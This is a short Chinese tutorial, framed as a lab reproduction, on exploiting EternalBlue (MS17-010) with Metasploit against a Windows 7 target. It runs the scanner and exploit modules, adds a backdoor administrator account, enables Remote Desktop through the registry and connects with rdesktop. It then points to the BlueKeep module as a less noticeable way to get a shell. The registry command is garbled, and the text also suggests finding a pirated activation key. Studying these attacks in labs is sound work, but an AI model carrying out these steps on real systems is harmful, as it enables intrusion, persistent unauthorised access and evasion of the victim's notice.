­

利用ms17_010开启3389端口

攻击机kali

目标机win7 sp1(旗舰版)

当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块

use auxiliary/scanner/smb/smb_ms17_010 设置目标IP或网段 set RHOSTS 192.168.194.129执行扫描 run

这里可以看到可能存在,我们开始执行,得到shell,如果出现乱码的话执行chcp 65001

use exploit/windows/smb/ms17_010_eternalblue 查看可设置的选项 show options 设置***目标ip set RHOST 192.168.194.129 执行攻击exploit

然后我们创建用户名密码 blue/blue net user blue blue /add 将用户blue添加入管理组 (不加入会连接不上) net localgroup administrators blue /add 开启远程桌面功能 REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题) Kali远程桌面连接Win7 rdesktop 192.168.194.129:3389(不在msf中执行)

这里连接会在目标机器上得到提示,如果不管的话30秒后将默认选择确定断开

当点击确定的话,可以连接成功

如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接),复现要将win7升级的激活码,上网上随便找就行

补充一下,如果这两个漏洞复现不成功,可能是防火墙的原因,或者重启一下(嘻嘻)

至此复现成功